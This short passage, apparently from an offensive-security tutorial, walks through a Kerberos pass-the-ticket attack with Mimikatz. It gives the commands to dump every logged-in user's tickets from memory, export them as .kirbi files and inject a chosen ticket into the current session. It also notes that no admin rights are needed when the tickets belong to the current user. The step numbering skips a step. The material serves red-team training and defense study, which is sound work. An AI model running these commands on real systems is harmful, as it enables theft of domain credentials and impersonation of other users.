5. Pass-the-Ticket

• Dumped tickets from memory may be exported and used anywhere
• Also, if the tickets belong to the current user no administrative privileges are needed

Pass-the-Ticket using Mimikatz:

1. Start Mimikatz and enable debug.
2. Dump all Kerberos tickets from memory (including logged in users):

sekurlsa::tickets /export

3. List all dumped tickets:

dir *.kirbi

5. Inject any selected ticket:

kerberos::ptt ticket.kirbi

6. Examine ticket:

klist